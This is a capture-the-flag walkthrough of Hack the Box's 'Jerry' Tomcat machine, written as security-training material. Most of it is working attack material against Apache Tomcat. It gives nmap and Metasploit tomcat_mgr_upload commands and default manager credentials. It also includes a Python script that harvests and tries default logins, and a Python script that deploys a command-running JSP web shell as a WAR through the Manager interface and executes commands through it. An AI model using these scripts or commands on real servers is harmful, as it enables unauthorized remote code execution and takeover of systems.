Hello CTF Crackers!! Today we are going to capture the flag on a challenge named “Jerry”, which is available online for those who want to improve their skills in penetration testing and black-box testing. Jerry is a retired vulnerable lab presented by ‘Hack the Box’ for online penetration-testing practice according to your experience level; they have a collection of vulnerable labs as challenges from beginner to expert level.
Level: Easy
Flags: There are two flags. (user.txt & root.txt)
IP Address: 10.10.10.95
Methodology:
§ Port scanning and service discovery
§ Browsing to the IP on port 8080
§ Enumerating the served web page
§ Getting the login credentials
§ Attacking using Metasploit
§ Getting root access
§ Reading the flags
Walkthrough
Since these labs are available online via VPN, they have a static IP. The IP of Jerry is 10.10.10.95.
Let’s start off by scanning the target for open ports and service versions:
nmap -sV 10.10.10.95
Here we notice a very interesting result from the nmap scan: port 8080 is open and running Apache Tomcat/Coyote JSP engine 1.1. Port 8080 is Tomcat’s default HTTP connector port, so the Manager application is likely reachable there. (Note that -sV alone only covers nmap’s default top ports; add -p- if you want the full range.)
Next order of business is to browse to the IP on port 8080 in a web browser.
On opening the IP in the web browser, we are greeted with the default Tomcat page. After some enumeration here and there, we find the “Manager App” link.
Clicking this link brings up an HTTP Basic authentication prompt for the Manager application, as shown below.
Here, after some tweaking with a few passwords and other guesses, we found that clicking the “Cancel” button triggers a 401 error page.
Reading the example on that page closely gives us the logon credentials: Tomcat’s stock 401 page shows a sample tomcat-users.xml entry, and on this box that sample is the real credential.
User: tomcat
Password: s3cret
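The trick above relies on the stock Tomcat 401 page, which includes a sample tomcat-users.xml entry. As an added example (not part of the original write-up), the Python below fetches that 401 page the way the Cancel button does, pulls any <user .../> sample out of it, and tries it, followed by a short list of common Tomcat defaults, against /manager/html. The page body embedded in it is a constructed excerpt of the real 401 page, the default-credential list is an assumption, and the host and port are the ones from this box.

```python
"""Recover credentials from Tomcat's manager 401 page and test them.

Added example for this write-up, not the author's code. Tomcat's stock
401 page for /manager/html embeds a sample tomcat-users.xml entry, so a
manager protected by that sample is protected by a published password.
"""
import base64
import html
import re
import urllib.error
import urllib.request

# Constructed excerpt of the stock Tomcat 401 page (the XML sample is
# HTML-escaped in the real page as well).
SAMPLE_401_BODY = """<html><head><title>401 Unauthorized</title></head><body>
<h1>401 Unauthorized</h1>
<p>For example, to add the <tt>manager-gui</tt> role to a user named
<tt>tomcat</tt> with a password of <tt>s3cret</tt>, add the following to
the config file listed above.</p>
<pre>
&lt;role rolename="manager-gui"/&gt;
&lt;user username="tomcat" password="s3cret" roles="manager-gui"/&gt;
</pre>
</body></html>
"""

# Assumed short list of well-known Tomcat manager defaults to try after
# the page's own example.
COMMON_DEFAULTS = [
    ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("admin", "admin"),
    ("admin", "tomcat"), ("tomcat", "manager"), ("role1", "role1"),
]

USER_TAG = re.compile(r"<user\b([^>]*?)/?>", re.IGNORECASE)
ATTR = re.compile(r'(\w+)\s*=\s*"([^"]*)"')


def extract_example_users(body: str):
    """(username, password, roles) for every <user .../> sample in the body."""
    users = []
    for attrs in USER_TAG.findall(html.unescape(body)):
        kv = dict(ATTR.findall(attrs))
        if "username" in kv and "password" in kv:
            users.append((kv["username"], kv["password"], kv.get("roles", "")))
    return users


def candidate_credentials(body: str):
    """The page's own example first, then common defaults, without repeats."""
    seen, ordered = set(), []
    pairs = [(u, p) for u, p, _ in extract_example_users(body)] + COMMON_DEFAULTS
    for pair in pairs:
        if pair not in seen:
            seen.add(pair)
            ordered.append(pair)
    return ordered


def basic_auth_header(user: str, password: str) -> str:
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def fetch_401_body(host: str, port: int, timeout: float = 5.0) -> str:
    """GET /manager/html with no credentials: the body of the 401 response
    is exactly what the browser shows after you press Cancel."""
    url = f"http://{host}:{port}/manager/html"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode(errors="replace")  # manager not protected
    except urllib.error.HTTPError as err:
        return err.read().decode(errors="replace")


def manager_status(host, port, user, password, timeout=5.0) -> int:
    """HTTP status for /manager/html with Basic auth: 200 = valid login with
    manager-gui, 403 = valid login but missing the role, 401 = bad login."""
    req = urllib.request.Request(
        f"http://{host}:{port}/manager/html",
        headers={"Authorization": basic_auth_header(user, password)},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def find_manager_login(host, port, candidates, timeout=5.0):
    """First (user, password, status) that is not rejected with 401."""
    for user, pw in candidates:
        status = manager_status(host, port, user, pw, timeout)
        if status != 401:
            return user, pw, status
    return None


if __name__ == "__main__":
    HOST, PORT = "10.10.10.95", 8080
    print(find_manager_login(HOST, PORT, candidate_credentials(fetch_401_body(HOST, PORT))))
```

A 403 from manager_status is still a finding: the login is valid, it just lacks manager-gui, and the same account may carry manager-script or admin-gui instead.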
It’s time to attack, using the Swiss Army knife of any penetration tester: Metasploit.
After some research and a few tries, it was clear that we can use the tomcat_mgr_upload exploit: given valid Manager credentials, it packages a JSP payload into a WAR file and deploys it through the Manager application, which then executes it.
So, let’s do this:
msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 10.10.10.95
msf exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
msf exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
msf exploit(multi/http/tomcat_mgr_upload) > exploit
(Older Metasploit versions name the target option RHOST rather than RHOSTS. The default payload is a reverse Java Meterpreter, so if no session comes back, check that LHOST is set to your VPN (tun0) address.)
As shown in the screenshot below, the exploit runs successfully and gives us a Meterpreter session with elevated privileges: Tomcat is running as a privileged service account on this box, so no separate privilege escalation is needed (getuid in the Meterpreter session shows which account you hold).
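What the module does under the hood is worth seeing by hand, because the same technique works when Metasploit is not available. The Python below is an added example, not from the write-up and not Metasploit’s own code: it builds a WAR containing a small command-runner JSP in memory, deploys it with a PUT to Tomcat’s text manager interface (/manager/text/deploy), runs a command through it and removes it again. Host, port and credentials are the walkthrough’s; the context path /poc and the JSP name are assumptions.

```python
"""Deploy a JSP to Tomcat through the Manager's text interface.

Added example: it does by hand what tomcat_mgr_upload automates (package a
JSP into a WAR and push it through the Manager application). Host, port
and credentials are the walkthrough's; /poc and cmd.jsp are assumptions.
"""
import base64
import io
import urllib.parse
import urllib.request
import zipfile

# Constructed minimal JSP: runs the command in ?cmd= and returns its output.
CMD_JSP = r'''<%@ page import="java.io.*" %><%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%>'''


def build_war(jsp_source: str, jsp_name: str = "cmd.jsp") -> bytes:
    """Return an in-memory WAR (a zip) holding one JSP at its root.
    No WEB-INF/web.xml is needed: Tomcat applies its default web.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def list_war_entries(war_bytes: bytes):
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return war.namelist()


def read_war_entry(war_bytes: bytes, name: str) -> str:
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return war.read(name).decode()


def basic_auth(user: str, password: str) -> dict:
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}


def manager_url(host: str, port: int, action: str, **params) -> str:
    """Build a /manager/text URL, e.g. manager_url(h, p, 'deploy', path='/x')."""
    query = urllib.parse.urlencode(params)
    return f"http://{host}:{port}/manager/text/{action}" + (f"?{query}" if query else "")


def deploy_war(host, port, user, password, path, war_bytes, timeout=10):
    """PUT the WAR to /manager/text/deploy (needs manager-script role);
    Tomcat answers with a one-line OK/FAIL status."""
    req = urllib.request.Request(
        manager_url(host, port, "deploy", path=path, update="true"),
        data=war_bytes, method="PUT",
        headers={**basic_auth(user, password), "Content-Type": "application/octet-stream"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace").strip()


def run_command(host, port, path, cmd, jsp_name="cmd.jsp", timeout=10):
    """Call the deployed JSP; output comes back as the account Tomcat runs as."""
    url = f"http://{host}:{port}{path}/{jsp_name}?" + urllib.parse.urlencode({"cmd": cmd})
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def undeploy(host, port, user, password, path, timeout=10):
    """Remove the context again so the shell is not left behind."""
    req = urllib.request.Request(manager_url(host, port, "undeploy", path=path),
                                 headers=basic_auth(user, password))
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace").strip()


if __name__ == "__main__":
    HOST, PORT, USER, PW, PATH = "10.10.10.95", 8080, "tomcat", "s3cret", "/poc"
    print(deploy_war(HOST, PORT, USER, PW, PATH, build_war(CMD_JSP)))
    print(run_command(HOST, PORT, PATH, "whoami"))
    print(undeploy(HOST, PORT, USER, PW, PATH))
```

/manager/text is gated by the manager-script role, while the HTML manager needs manager-gui; a valid login that still gets a 403 here has the wrong role, in which case the WAR has to go through the HTML upload form instead. The JSP executes as whatever account the Tomcat service runs under, which is why the session on this box arrives already privileged.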
We traverse the directories with commands like ls and cd to get the flags.
After a little enumeration we reach the C:\Users directory. Here we come across the Administrator user’s directory, so we go into it and then into its Desktop directory.
This gives us the flags directory, which on opening holds a text file named “2 for the price of 1”. Opening it gives us both the user and root flags.